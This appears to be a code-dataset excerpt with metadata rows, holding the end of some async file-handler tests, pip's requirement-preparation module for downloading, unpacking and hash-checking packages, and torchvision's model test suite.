handler = FilesHandler()
file_name = str(uuid4()) + ".txt"
full_file_path = str(temp_files_folder / file_name)
contents = "Lorem ipsum dolor sit"
await handler.write(full_file_path, contents, mode="wt")
with open(full_file_path, mode="rt") as f:
expected_contents = f.read()
assert contents == expected_contents
@pytest.mark.asyncio
async def test_write_file_with_iterable(temp_files_folder: pathlib.Path):
handler = FilesHandler()
file_name = str(uuid4()) + ".txt"
full_file_path = str(temp_files_folder / file_name)
async def provider():
yield b"Lorem "
await asyncio.sleep(0.01)
yield b"ipsum"
await asyncio.sleep(0.01)
yield b" dolor"
yield b" sit"
await handler.write(full_file_path, provider)
with open(full_file_path, mode="rb") as f:
expected_contents = f.read()
assert b"Lorem ipsum dolor sit" == expected_contents
@pytest.mark.asyncio
async def test_file_context_raises_for_invalid_mode():
handler = FilesHandler()
with pytest.raises(ValueError) as error_info:
async with handler.open("foo.txt", mode="xx") as file_context:
file_context.write("Foo")
assert "invalid mode" in str(error_info.value)
@pytest.mark.asyncio
async def test_file_context_raises_if_file_is_not_open():
with pytest.raises(TypeError) as error_info:
file_context = FileContext("foo.txt")
await file_context.read()
assert str(error_info.value) == "The file is not open."
| 27.686567
| 79
| 0.687332
|
acff7ffa1f7940a84d279f6e19cd90f1649c374e
| 23,290
|
py
|
Python
|
src/pip/_internal/operations/prepare.py
|
finn0/pip
|
e408f7077f2acceaa3c751f60eb466fcc676af7c
|
[
"MIT"
] | null | null | null |
src/pip/_internal/operations/prepare.py
|
finn0/pip
|
e408f7077f2acceaa3c751f60eb466fcc676af7c
|
[
"MIT"
] | null | null | null |
src/pip/_internal/operations/prepare.py
|
finn0/pip
|
e408f7077f2acceaa3c751f60eb466fcc676af7c
|
[
"MIT"
] | null | null | null |
"""Prepares a distribution for installation
"""
# The following comment should be removed at some point in the future.
# mypy: strict-optional=False
import logging
import mimetypes
import os
import shutil
from pip._vendor.packaging.utils import canonicalize_name
from pip._vendor.six import PY2
from pip._internal.distributions import (
make_distribution_for_install_requirement,
)
from pip._internal.distributions.installed import InstalledDistribution
from pip._internal.exceptions import (
DirectoryUrlHashUnsupported,
HashMismatch,
HashUnpinned,
InstallationError,
NetworkConnectionError,
PreviousBuildDirError,
VcsHashUnsupported,
)
from pip._internal.models.wheel import Wheel
from pip._internal.network.download import BatchDownloader, Downloader
from pip._internal.network.lazy_wheel import (
HTTPRangeRequestUnsupported,
dist_from_wheel_url,
)
from pip._internal.utils.filesystem import copy2_fixed
from pip._internal.utils.hashes import MissingHashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import (
display_path,
hide_url,
path_to_display,
rmtree,
)
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._internal.utils.unpacking import unpack_file
from pip._internal.vcs import vcs
if MYPY_CHECK_RUNNING:
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from mypy_extensions import TypedDict
from pip._vendor.pkg_resources import Distribution
from pip._internal.index.package_finder import PackageFinder
from pip._internal.models.link import Link
from pip._internal.network.session import PipSession
from pip._internal.req.req_install import InstallRequirement
from pip._internal.req.req_tracker import RequirementTracker
from pip._internal.utils.hashes import Hashes
if PY2:
CopytreeKwargs = TypedDict(
'CopytreeKwargs',
{
'ignore': Callable[[str, List[str]], List[str]],
'symlinks': bool,
},
total=False,
)
else:
CopytreeKwargs = TypedDict(
'CopytreeKwargs',
{
'copy_function': Callable[[str, str], None],
'ignore': Callable[[str, List[str]], List[str]],
'ignore_dangling_symlinks': bool,
'symlinks': bool,
},
total=False,
)
logger = logging.getLogger(__name__)
def _get_prepared_distribution(
req, # type: InstallRequirement
req_tracker, # type: RequirementTracker
finder, # type: PackageFinder
build_isolation, # type: bool
):
# type: (...) -> Distribution
"""Prepare a distribution for installation."""
abstract_dist = make_distribution_for_install_requirement(req)
with req_tracker.track(req):
abstract_dist.prepare_distribution_metadata(finder, build_isolation)
return abstract_dist.get_pkg_resources_distribution()
def unpack_vcs_link(link, location):
# type: (Link, str) -> None
vcs_backend = vcs.get_backend_for_scheme(link.scheme)
assert vcs_backend is not None
vcs_backend.unpack(location, url=hide_url(link.url))
class File(object):
def __init__(self, path, content_type):
# type: (str, Optional[str]) -> None
self.path = path
if content_type is None:
self.content_type = mimetypes.guess_type(path)[0]
else:
self.content_type = content_type
def get_http_url(
link, # type: Link
download, # type: Downloader
download_dir=None, # type: Optional[str]
hashes=None, # type: Optional[Hashes]
):
# type: (...) -> File
temp_dir = TempDirectory(kind="unpack", globally_managed=True)
# If a download dir is specified, is the file already downloaded there?
already_downloaded_path = None
if download_dir:
already_downloaded_path = _check_download_dir(
link, download_dir, hashes
)
if already_downloaded_path:
from_path = already_downloaded_path
content_type = None
else:
# let's download to a tmp dir
from_path, content_type = download(link, temp_dir.path)
if hashes:
hashes.check_against_path(from_path)
return File(from_path, content_type)
def _copy2_ignoring_special_files(src, dest):
# type: (str, str) -> None
"""Copying special files is not supported, but as a convenience to users
we skip errors copying them. This supports tools that may create e.g.
socket files in the project source directory.
"""
try:
copy2_fixed(src, dest)
except shutil.SpecialFileError as e:
# SpecialFileError may be raised due to either the source or
# destination. If the destination was the cause then we would actually
# care, but since the destination directory is deleted prior to
# copy we ignore all of them assuming it is caused by the source.
logger.warning(
"Ignoring special file error '%s' encountered copying %s to %s.",
str(e),
path_to_display(src),
path_to_display(dest),
)
def _copy_source_tree(source, target):
# type: (str, str) -> None
target_abspath = os.path.abspath(target)
target_basename = os.path.basename(target_abspath)
target_dirname = os.path.dirname(target_abspath)
def ignore(d, names):
# type: (str, List[str]) -> List[str]
skipped = [] # type: List[str]
if d == source:
# Pulling in those directories can potentially be very slow,
# exclude the following directories if they appear in the top
# level dir (and only it).
# See discussion at https://github.com/pypa/pip/pull/6770
skipped += ['.tox', '.nox']
if os.path.abspath(d) == target_dirname:
# Prevent an infinite recursion if the target is in source.
# This can happen when TMPDIR is set to ${PWD}/...
# and we copy PWD to TMPDIR.
skipped += [target_basename]
return skipped
kwargs = dict(ignore=ignore, symlinks=True) # type: CopytreeKwargs
if not PY2:
# Python 2 does not support copy_function, so we only ignore
# errors on special file copy in Python 3.
kwargs['copy_function'] = _copy2_ignoring_special_files
shutil.copytree(source, target, **kwargs)
def get_file_url(
link, # type: Link
download_dir=None, # type: Optional[str]
hashes=None # type: Optional[Hashes]
):
# type: (...) -> File
"""Get file and optionally check its hash.
"""
# If a download dir is specified, is the file already there and valid?
already_downloaded_path = None
if download_dir:
already_downloaded_path = _check_download_dir(
link, download_dir, hashes
)
if already_downloaded_path:
from_path = already_downloaded_path
else:
from_path = link.file_path
# If --require-hashes is off, `hashes` is either empty, the
# link's embedded hash, or MissingHashes; it is required to
# match. If --require-hashes is on, we are satisfied by any
# hash in `hashes` matching: a URL-based or an option-based
# one; no internet-sourced hash will be in `hashes`.
if hashes:
hashes.check_against_path(from_path)
return File(from_path, None)
def unpack_url(
link, # type: Link
location, # type: str
download, # type: Downloader
download_dir=None, # type: Optional[str]
hashes=None, # type: Optional[Hashes]
):
# type: (...) -> Optional[File]
"""Unpack link into location, downloading if required.
:param hashes: A Hashes object, one of whose embedded hashes must match,
or HashMismatch will be raised. If the Hashes is empty, no matches are
required, and unhashable types of requirements (like VCS ones, which
would ordinarily raise HashUnsupported) are allowed.
"""
# non-editable vcs urls
if link.is_vcs:
unpack_vcs_link(link, location)
return None
# If it's a url to a local directory
if link.is_existing_dir():
if os.path.isdir(location):
rmtree(location)
_copy_source_tree(link.file_path, location)
return None
# file urls
if link.is_file:
file = get_file_url(link, download_dir, hashes=hashes)
# http urls
else:
file = get_http_url(
link,
download,
download_dir,
hashes=hashes,
)
# unpack the archive to the build dir location. even when only downloading
# archives, they have to be unpacked to parse dependencies, except wheels
if not link.is_wheel:
unpack_file(file.path, location, file.content_type)
return file
def _check_download_dir(link, download_dir, hashes):
# type: (Link, str, Optional[Hashes]) -> Optional[str]
""" Check download_dir for previously downloaded file with correct hash
If a correct file is found return its path else None
"""
download_path = os.path.join(download_dir, link.filename)
if not os.path.exists(download_path):
return None
# If already downloaded, does its hash match?
logger.info('File was already downloaded %s', download_path)
if hashes:
try:
hashes.check_against_path(download_path)
except HashMismatch:
logger.warning(
'Previously-downloaded file %s has bad hash. '
'Re-downloading.',
download_path
)
os.unlink(download_path)
return None
return download_path
class RequirementPreparer(object):
"""Prepares a Requirement
"""
def __init__(
self,
build_dir, # type: str
download_dir, # type: Optional[str]
src_dir, # type: str
wheel_download_dir, # type: Optional[str]
build_isolation, # type: bool
req_tracker, # type: RequirementTracker
session, # type: PipSession
progress_bar, # type: str
finder, # type: PackageFinder
require_hashes, # type: bool
use_user_site, # type: bool
lazy_wheel, # type: bool
):
# type: (...) -> None
super(RequirementPreparer, self).__init__()
self.src_dir = src_dir
self.build_dir = build_dir
self.req_tracker = req_tracker
self._session = session
self._download = Downloader(session, progress_bar)
self._batch_download = BatchDownloader(session, progress_bar)
self.finder = finder
# Where still-packed archives should be written to. If None, they are
# not saved, and are deleted immediately after unpacking.
self.download_dir = download_dir
# Where still-packed .whl files should be written to. If None, they are
# written to the download_dir parameter. Separate to download_dir to
# permit only keeping wheel archives for pip wheel.
self.wheel_download_dir = wheel_download_dir
# NOTE
# download_dir and wheel_download_dir overlap semantically and may
# be combined if we're willing to have non-wheel archives present in
# the wheelhouse output by 'pip wheel'.
# Is build isolation allowed?
self.build_isolation = build_isolation
# Should hash-checking be required?
self.require_hashes = require_hashes
# Should install in user site-packages?
self.use_user_site = use_user_site
# Should wheels be downloaded lazily?
self.use_lazy_wheel = lazy_wheel
# Memoized downloaded files, as mapping of url: (path, mime type)
self._downloaded = {} # type: Dict[str, Tuple[str, str]]
# Previous "header" printed for a link-based InstallRequirement
self._previous_requirement_header = ("", "")
@property
def _download_should_save(self):
# type: () -> bool
if not self.download_dir:
return False
if os.path.exists(self.download_dir):
return True
logger.critical('Could not find download directory')
raise InstallationError(
"Could not find or access download directory '{}'"
.format(self.download_dir))
def _log_preparing_link(self, req):
# type: (InstallRequirement) -> None
"""Provide context for the requirement being prepared."""
if req.link.is_file and not req.original_link_is_in_wheel_cache:
message = "Processing %s"
information = str(display_path(req.link.file_path))
else:
message = "Collecting %s"
information = str(req.req or req)
if (message, information) != self._previous_requirement_header:
self._previous_requirement_header = (message, information)
logger.info(message, information)
if req.original_link_is_in_wheel_cache:
with indent_log():
logger.info("Using cached %s", req.link.filename)
def _get_download_dir(self, link):
# type: (Link) -> Optional[str]
if link.is_wheel and self.wheel_download_dir:
# Download wheels to a dedicated dir when doing `pip wheel`.
return self.wheel_download_dir
return self.download_dir
def _ensure_link_req_src_dir(self, req, download_dir, parallel_builds):
# type: (InstallRequirement, Optional[str], bool) -> None
"""Ensure source_dir of a linked InstallRequirement."""
# Since source_dir is only set for editable requirements.
if req.link.is_wheel:
# We don't need to unpack wheels, so no need for a source
# directory.
return
assert req.source_dir is None
# We always delete unpacked sdists after pip runs.
req.ensure_has_source_dir(
self.build_dir,
autodelete=True,
parallel_builds=parallel_builds,
)
# If a checkout exists, it's unwise to keep going. version
# inconsistencies are logged later, but do not fail the
# installation.
# FIXME: this won't upgrade when there's an existing
# package unpacked in `req.source_dir`
if os.path.exists(os.path.join(req.source_dir, 'setup.py')):
raise PreviousBuildDirError(
"pip can't proceed with requirements '{}' due to a"
"pre-existing build directory ({}). This is likely "
"due to a previous installation that failed . pip is "
"being responsible and not assuming it can delete this. "
"Please delete it and try again.".format(req, req.source_dir)
)
def _get_linked_req_hashes(self, req):
# type: (InstallRequirement) -> Hashes
# By the time this is called, the requirement's link should have
# been checked so we can tell what kind of requirements req is
# and raise some more informative errors than otherwise.
# (For example, we can raise VcsHashUnsupported for a VCS URL
# rather than HashMissing.)
if not self.require_hashes:
return req.hashes(trust_internet=True)
# We could check these first 2 conditions inside unpack_url
# and save repetition of conditions, but then we would
# report less-useful error messages for unhashable
# requirements, complaining that there's no hash provided.
if req.link.is_vcs:
raise VcsHashUnsupported()
if req.link.is_existing_dir():
raise DirectoryUrlHashUnsupported()
# Unpinned packages are asking for trouble when a new version
# is uploaded. This isn't a security check, but it saves users
# a surprising hash mismatch in the future.
# file:/// URLs aren't pinnable, so don't complain about them
# not being pinned.
if req.original_link is None and not req.is_pinned:
raise HashUnpinned()
# If known-good hashes are missing for this requirement,
# shim it with a facade object that will provoke hash
# computation and then raise a HashMissing exception
# showing the user what the hash should be.
return req.hashes(trust_internet=False) or MissingHashes()
def _fetch_metadata_using_lazy_wheel(self, link):
# type: (Link) -> Optional[Distribution]
"""Fetch metadata using lazy wheel, if possible."""
if not self.use_lazy_wheel:
return None
if self.require_hashes:
logger.debug('Lazy wheel is not used as hash checking is required')
return None
if link.is_file or not link.is_wheel:
logger.debug(
'Lazy wheel is not used as '
'%r does not points to a remote wheel',
link,
)
return None
wheel = Wheel(link.filename)
name = canonicalize_name(wheel.name)
logger.info(
'Obtaining dependency information from %s %s',
name, wheel.version,
)
url = link.url.split('#', 1)[0]
try:
return dist_from_wheel_url(name, url, self._session)
except HTTPRangeRequestUnsupported:
logger.debug('%s does not support range requests', url)
return None
def prepare_linked_requirement(self, req, parallel_builds=False):
# type: (InstallRequirement, bool) -> Distribution
"""Prepare a requirement to be obtained from req.link."""
assert req.link
link = req.link
self._log_preparing_link(req)
with indent_log():
wheel_dist = self._fetch_metadata_using_lazy_wheel(link)
if wheel_dist is not None:
req.needs_more_preparation = True
return wheel_dist
return self._prepare_linked_requirement(req, parallel_builds)
def prepare_linked_requirements_more(self, reqs, parallel_builds=False):
# type: (Iterable[InstallRequirement], bool) -> None
"""Prepare a linked requirement more, if needed."""
reqs = [req for req in reqs if req.needs_more_preparation]
links = [] # type: List[Link]
for req in reqs:
download_dir = self._get_download_dir(req.link)
if download_dir is not None:
hashes = self._get_linked_req_hashes(req)
file_path = _check_download_dir(req.link, download_dir, hashes)
if download_dir is None or file_path is None:
links.append(req.link)
else:
self._downloaded[req.link.url] = file_path, None
# Let's download to a temporary directory.
tmpdir = TempDirectory(kind="unpack", globally_managed=True).path
self._downloaded.update(self._batch_download(links, tmpdir))
for req in reqs:
self._prepare_linked_requirement(req, parallel_builds)
def _prepare_linked_requirement(self, req, parallel_builds):
# type: (InstallRequirement, bool) -> Distribution
assert req.link
link = req.link
download_dir = self._get_download_dir(link)
self._ensure_link_req_src_dir(req, download_dir, parallel_builds)
hashes = self._get_linked_req_hashes(req)
if link.url not in self._downloaded:
try:
local_file = unpack_url(
link, req.source_dir, self._download,
download_dir, hashes,
)
except NetworkConnectionError as exc:
raise InstallationError(
'Could not install requirement {} because of HTTP '
'error {} for URL {}'.format(req, exc, link)
)
else:
file_path, content_type = self._downloaded[link.url]
if hashes:
hashes.check_against_path(file_path)
local_file = File(file_path, content_type)
# For use in later processing,
# preserve the file path on the requirement.
if local_file:
req.local_file_path = local_file.path
dist = _get_prepared_distribution(
req, self.req_tracker, self.finder, self.build_isolation,
)
if download_dir:
if link.is_existing_dir():
logger.info('Link is a directory, ignoring download_dir')
elif local_file:
download_location = os.path.join(download_dir, link.filename)
if not os.path.exists(download_location):
shutil.copy(local_file.path, download_location)
download_path = display_path(download_location)
logger.info('Saved %s', download_path)
if self._download_should_save:
# Make a .zip of the source_dir we already created.
if link.is_vcs:
req.archive(self.download_dir)
return dist
def prepare_editable_requirement(
self,
req, # type: InstallRequirement
):
# type: (...) -> Distribution
"""Prepare an editable requirement
"""
assert req.editable, "cannot prepare a non-editable req as editable"
logger.info('Obtaining %s', req)
with indent_log():
if self.require_hashes:
raise InstallationError(
'The editable requirement {} cannot be installed when '
'requiring hashes, because there is no single file to '
'hash.'.format(req)
)
req.ensure_has_source_dir(self.src_dir)
req.update_editable(not self._download_should_save)
dist = _get_prepared_distribution(
req, self.req_tracker, self.finder, self.build_isolation,
)
if self._download_should_save:
req.archive(self.download_dir)
req.check_if_exists(self.use_user_site)
return dist
def prepare_installed_requirement(
self,
req, # type: InstallRequirement
skip_reason # type: str
):
# type: (...) -> Distribution
"""Prepare an already-installed requirement
"""
assert req.satisfied_by, "req should have been satisfied but isn't"
assert skip_reason is not None, (
"did not get skip reason skipped but req.satisfied_by "
"is set to {}".format(req.satisfied_by)
)
logger.info(
'Requirement %s: %s (%s)',
skip_reason, req, req.satisfied_by.version
)
with indent_log():
if self.require_hashes:
logger.debug(
'Since it is already installed, we are trusting this '
'package without checking its hash. To ensure a '
'completely repeatable environment, install into an '
'empty virtualenv.'
)
return InstalledDistribution(req).get_pkg_resources_distribution()
| 36.677165
| 79
| 0.633791
|
acff816852b738b5f80913ad40982a2c818ad38d
| 17,100
|
py
|
Python
|
test/test_models.py
|
robohouse-delft/torchvision
|
1fe1e110677ab22f8512293987939d31916b7a8b
|
[
"BSD-3-Clause"
] | 1
|
2020-10-26T08:53:51.000Z
|
2020-10-26T08:53:51.000Z
|
test/test_models.py
|
robohouse-delft/torchvision
|
1fe1e110677ab22f8512293987939d31916b7a8b
|
[
"BSD-3-Clause"
] | null | null | null |
test/test_models.py
|
robohouse-delft/torchvision
|
1fe1e110677ab22f8512293987939d31916b7a8b
|
[
"BSD-3-Clause"
] | 1
|
2020-12-27T03:45:56.000Z
|
2020-12-27T03:45:56.000Z
|
from common_utils import TestCase, map_nested_tensor_object, freeze_rng_state
from collections import OrderedDict
from itertools import product
import torch
import torch.nn as nn
import numpy as np
from torchvision import models
import unittest
import traceback
import random
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
def get_available_classification_models():
# TODO add a registration mechanism to torchvision.models
return [k for k, v in models.__dict__.items() if callable(v) and k[0].lower() == k[0] and k[0] != "_"]
def get_available_segmentation_models():
# TODO add a registration mechanism to torchvision.models
return [k for k, v in models.segmentation.__dict__.items() if callable(v) and k[0].lower() == k[0] and k[0] != "_"]
def get_available_detection_models():
# TODO add a registration mechanism to torchvision.models
return [k for k, v in models.detection.__dict__.items() if callable(v) and k[0].lower() == k[0] and k[0] != "_"]
def get_available_video_models():
# TODO add a registration mechanism to torchvision.models
return [k for k, v in models.video.__dict__.items() if callable(v) and k[0].lower() == k[0] and k[0] != "_"]
# models that are in torch hub, as well as r3d_18. we tried testing all models
# but the test was too slow. not included are detection models, because
# they are not yet supported in JIT.
# If 'unwrapper' is provided it will be called with the script model outputs
# before they are compared to the eager model outputs. This is useful if the
# model outputs are different between TorchScript / Eager mode
script_test_models = {
'deeplabv3_resnet50': {},
'deeplabv3_resnet101': {},
'mobilenet_v2': {},
'resnext50_32x4d': {},
'fcn_resnet50': {},
'fcn_resnet101': {},
'googlenet': {
'unwrapper': lambda x: x.logits
},
'densenet121': {},
'resnet18': {},
'alexnet': {},
'shufflenet_v2_x1_0': {},
'squeezenet1_0': {},
'vgg11': {},
'inception_v3': {
'unwrapper': lambda x: x.logits
},
'r3d_18': {},
"fasterrcnn_resnet50_fpn": {
'unwrapper': lambda x: x[1]
},
"maskrcnn_resnet50_fpn": {
'unwrapper': lambda x: x[1]
},
"keypointrcnn_resnet50_fpn": {
'unwrapper': lambda x: x[1]
},
"retinanet_resnet50_fpn": {
'unwrapper': lambda x: x[1]
}
}
# The following models exhibit flaky numerics under autocast in _test_*_model harnesses.
# This may be caused by the harness environment (e.g. num classes, input initialization
# via torch.rand), and does not prove autocast is unsuitable when training with real data
# (autocast has been used successfully with real data for some of these models).
# TODO: investigate why autocast numerics are flaky in the harnesses.
#
# For the following models, _test_*_model harnesses skip numerical checks on outputs when
# trying autocast. However, they still try an autocasted forward pass, so they still ensure
# autocast coverage suffices to prevent dtype errors in each model.
autocast_flaky_numerics = (
"fasterrcnn_resnet50_fpn",
"inception_v3",
"keypointrcnn_resnet50_fpn",
"maskrcnn_resnet50_fpn",
"resnet101",
"resnet152",
"wide_resnet101_2",
"retinanet_resnet50_fpn",
)
class ModelTester(TestCase):
def checkModule(self, model, name, args):
if name not in script_test_models:
return
unwrapper = script_test_models[name].get('unwrapper', None)
return super(ModelTester, self).checkModule(model, args, unwrapper=unwrapper, skip=False)
def _test_classification_model(self, name, input_shape, dev):
set_rng_seed(0)
# passing num_class equal to a number other than 1000 helps in making the test
# more enforcing in nature
model = models.__dict__[name](num_classes=50)
model.eval().to(device=dev)
# RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
x = torch.rand(input_shape).to(device=dev)
out = model(x)
self.assertExpected(out.cpu(), prec=0.1, strip_suffix="_" + dev)
self.assertEqual(out.shape[-1], 50)
self.checkModule(model, name, (x,))
if dev == "cuda":
with torch.cuda.amp.autocast():
out = model(x)
# See autocast_flaky_numerics comment at top of file.
if name not in autocast_flaky_numerics:
self.assertExpected(out.cpu(), prec=0.1, strip_suffix="_" + dev)
self.assertEqual(out.shape[-1], 50)
def _test_segmentation_model(self, name, dev):
# passing num_class equal to a number other than 1000 helps in making the test
# more enforcing in nature
model = models.segmentation.__dict__[name](num_classes=50, pretrained_backbone=False)
model.eval().to(device=dev)
input_shape = (1, 3, 300, 300)
# RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
x = torch.rand(input_shape).to(device=dev)
out = model(x)
self.assertEqual(tuple(out["out"].shape), (1, 50, 300, 300))
self.checkModule(model, name, (x,))
if dev == "cuda":
with torch.cuda.amp.autocast():
out = model(x)
self.assertEqual(tuple(out["out"].shape), (1, 50, 300, 300))
def _test_detection_model(self, name, dev):
set_rng_seed(0)
kwargs = {}
if "retinanet" in name:
kwargs["score_thresh"] = 0.013
model = models.detection.__dict__[name](num_classes=50, pretrained_backbone=False, **kwargs)
model.eval().to(device=dev)
input_shape = (3, 300, 300)
# RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
x = torch.rand(input_shape).to(device=dev)
model_input = [x]
out = model(model_input)
self.assertIs(model_input[0], x)
def check_out(out):
self.assertEqual(len(out), 1)
def subsample_tensor(tensor):
num_elems = tensor.numel()
num_samples = 20
if num_elems <= num_samples:
return tensor
flat_tensor = tensor.flatten()
ith_index = num_elems // num_samples
return flat_tensor[ith_index - 1::ith_index]
def compute_mean_std(tensor):
# can't compute mean of integral tensor
tensor = tensor.to(torch.double)
mean = torch.mean(tensor)
std = torch.std(tensor)
return {"mean": mean, "std": std}
if name == "maskrcnn_resnet50_fpn":
# maskrcnn_resnet_50_fpn numerically unstable across platforms, so for now
# compare results with mean and std
test_value = map_nested_tensor_object(out, tensor_map_fn=compute_mean_std)
# mean values are small, use large prec
self.assertExpected(test_value, prec=.01, strip_suffix="_" + dev)
else:
self.assertExpected(map_nested_tensor_object(out, tensor_map_fn=subsample_tensor),
prec=0.01,
strip_suffix="_" + dev)
check_out(out)
scripted_model = torch.jit.script(model)
scripted_model.eval()
scripted_out = scripted_model(model_input)[1]
self.assertEqual(scripted_out[0]["boxes"], out[0]["boxes"])
self.assertEqual(scripted_out[0]["scores"], out[0]["scores"])
# labels currently float in script: need to investigate (though same result)
self.assertEqual(scripted_out[0]["labels"].to(dtype=torch.long), out[0]["labels"])
self.assertTrue("boxes" in out[0])
self.assertTrue("scores" in out[0])
self.assertTrue("labels" in out[0])
# don't check script because we are compiling it here:
# TODO: refactor tests
# self.check_script(model, name)
self.checkModule(model, name, ([x],))
if dev == "cuda":
with torch.cuda.amp.autocast():
out = model(model_input)
# See autocast_flaky_numerics comment at top of file.
if name not in autocast_flaky_numerics:
check_out(out)
def _test_detection_model_validation(self, name):
set_rng_seed(0)
model = models.detection.__dict__[name](num_classes=50, pretrained_backbone=False)
input_shape = (3, 300, 300)
x = [torch.rand(input_shape)]
# validate that targets are present in training
self.assertRaises(ValueError, model, x)
# validate type
targets = [{'boxes': 0.}]
self.assertRaises(ValueError, model, x, targets=targets)
# validate boxes shape
for boxes in (torch.rand((4,)), torch.rand((1, 5))):
targets = [{'boxes': boxes}]
self.assertRaises(ValueError, model, x, targets=targets)
# validate that no degenerate boxes are present
boxes = torch.tensor([[1, 3, 1, 4], [2, 4, 3, 4]])
targets = [{'boxes': boxes}]
self.assertRaises(ValueError, model, x, targets=targets)
def _test_video_model(self, name, dev):
# the default input shape is
# bs * num_channels * clip_len * h *w
input_shape = (1, 3, 4, 112, 112)
# test both basicblock and Bottleneck
model = models.video.__dict__[name](num_classes=50)
model.eval().to(device=dev)
# RNG always on CPU, to ensure x in cuda tests is bitwise identical to x in cpu tests
x = torch.rand(input_shape).to(device=dev)
out = model(x)
self.checkModule(model, name, (x,))
self.assertEqual(out.shape[-1], 50)
if dev == "cuda":
with torch.cuda.amp.autocast():
out = model(x)
self.assertEqual(out.shape[-1], 50)
def _make_sliced_model(self, model, stop_layer):
layers = OrderedDict()
for name, layer in model.named_children():
layers[name] = layer
if name == stop_layer:
break
new_model = torch.nn.Sequential(layers)
return new_model
def test_memory_efficient_densenet(self):
input_shape = (1, 3, 300, 300)
x = torch.rand(input_shape)
for name in ['densenet121', 'densenet169', 'densenet201', 'densenet161']:
model1 = models.__dict__[name](num_classes=50, memory_efficient=True)
params = model1.state_dict()
num_params = sum([x.numel() for x in model1.parameters()])
model1.eval()
out1 = model1(x)
out1.sum().backward()
num_grad = sum([x.grad.numel() for x in model1.parameters() if x.grad is not None])
model2 = models.__dict__[name](num_classes=50, memory_efficient=False)
model2.load_state_dict(params)
model2.eval()
out2 = model2(x)
max_diff = (out1 - out2).abs().max()
self.assertTrue(num_params == num_grad)
self.assertTrue(max_diff < 1e-5)
def test_resnet_dilation(self):
# TODO improve tests to also check that each layer has the right dimensionality
for i in product([False, True], [False, True], [False, True]):
model = models.__dict__["resnet50"](replace_stride_with_dilation=i)
model = self._make_sliced_model(model, stop_layer="layer4")
model.eval()
x = torch.rand(1, 3, 224, 224)
out = model(x)
f = 2 ** sum(i)
self.assertEqual(out.shape, (1, 2048, 7 * f, 7 * f))
def test_mobilenetv2_residual_setting(self):
model = models.__dict__["mobilenet_v2"](inverted_residual_setting=[[1, 16, 1, 1], [6, 24, 2, 2]])
model.eval()
x = torch.rand(1, 3, 224, 224)
out = model(x)
self.assertEqual(out.shape[-1], 1000)
def test_mobilenetv2_norm_layer(self):
model = models.__dict__["mobilenet_v2"]()
self.assertTrue(any(isinstance(x, nn.BatchNorm2d) for x in model.modules()))
def get_gn(num_channels):
return nn.GroupNorm(32, num_channels)
model = models.__dict__["mobilenet_v2"](norm_layer=get_gn)
self.assertFalse(any(isinstance(x, nn.BatchNorm2d) for x in model.modules()))
self.assertTrue(any(isinstance(x, nn.GroupNorm) for x in model.modules()))
def test_fasterrcnn_double(self):
model = models.detection.fasterrcnn_resnet50_fpn(num_classes=50, pretrained_backbone=False)
model.double()
model.eval()
input_shape = (3, 300, 300)
x = torch.rand(input_shape, dtype=torch.float64)
model_input = [x]
out = model(model_input)
self.assertIs(model_input[0], x)
self.assertEqual(len(out), 1)
self.assertTrue("boxes" in out[0])
self.assertTrue("scores" in out[0])
self.assertTrue("labels" in out[0])
def test_googlenet_eval(self):
m = torch.jit.script(models.googlenet(pretrained=True).eval())
self.checkModule(m, "googlenet", torch.rand(1, 3, 224, 224))
@unittest.skipIf(not torch.cuda.is_available(), 'needs GPU')
def test_fasterrcnn_switch_devices(self):
def checkOut(out):
self.assertEqual(len(out), 1)
self.assertTrue("boxes" in out[0])
self.assertTrue("scores" in out[0])
self.assertTrue("labels" in out[0])
model = models.detection.fasterrcnn_resnet50_fpn(num_classes=50, pretrained_backbone=False)
model.cuda()
model.eval()
input_shape = (3, 300, 300)
x = torch.rand(input_shape, device='cuda')
model_input = [x]
out = model(model_input)
self.assertIs(model_input[0], x)
checkOut(out)
with torch.cuda.amp.autocast():
out = model(model_input)
checkOut(out)
# now switch to cpu and make sure it works
model.cpu()
x = x.cpu()
out_cpu = model([x])
checkOut(out_cpu)
def test_generalizedrcnn_transform_repr(self):
min_size, max_size = 224, 299
image_mean = [0.485, 0.456, 0.406]
image_std = [0.229, 0.224, 0.225]
t = models.detection.transform.GeneralizedRCNNTransform(min_size=min_size,
max_size=max_size,
image_mean=image_mean,
image_std=image_std)
# Check integrity of object __repr__ attribute
expected_string = 'GeneralizedRCNNTransform('
_indent = '\n '
expected_string += '{0}Normalize(mean={1}, std={2})'.format(_indent, image_mean, image_std)
expected_string += '{0}Resize(min_size=({1},), max_size={2}, '.format(_indent, min_size, max_size)
expected_string += "mode='bilinear')\n)"
self.assertEqual(t.__repr__(), expected_string)
_devs = ["cpu", "cuda"] if torch.cuda.is_available() else ["cpu"]
for model_name in get_available_classification_models():
for dev in _devs:
# for-loop bodies don't define scopes, so we have to save the variables
# we want to close over in some way
def do_test(self, model_name=model_name, dev=dev):
input_shape = (1, 3, 224, 224)
if model_name in ['inception_v3']:
input_shape = (1, 3, 299, 299)
self._test_classification_model(model_name, input_shape, dev)
setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)
for model_name in get_available_segmentation_models():
for dev in _devs:
# for-loop bodies don't define scopes, so we have to save the variables
# we want to close over in some way
def do_test(self, model_name=model_name, dev=dev):
self._test_segmentation_model(model_name, dev)
setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)
for model_name in get_available_detection_models():
for dev in _devs:
# for-loop bodies don't define scopes, so we have to save the variables
# we want to close over in some way
def do_test(self, model_name=model_name, dev=dev):
self._test_detection_model(model_name, dev)
setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)
def do_validation_test(self, model_name=model_name):
self._test_detection_model_validation(model_name)
setattr(ModelTester, "test_" + model_name + "_validation", do_validation_test)
for model_name in get_available_video_models():
for dev in _devs:
def do_test(self, model_name=model_name, dev=dev):
self._test_video_model(model_name, dev)
setattr(ModelTester, "test_" + model_name + "_" + dev, do_test)
if __name__ == '__main__':
unittest.main()
| 39.220183
| 119
| 0.619532
|
acff8255155a8b2d331a4bde1acd37fdecb70f43
| 44,174
|
py
|
Python
|
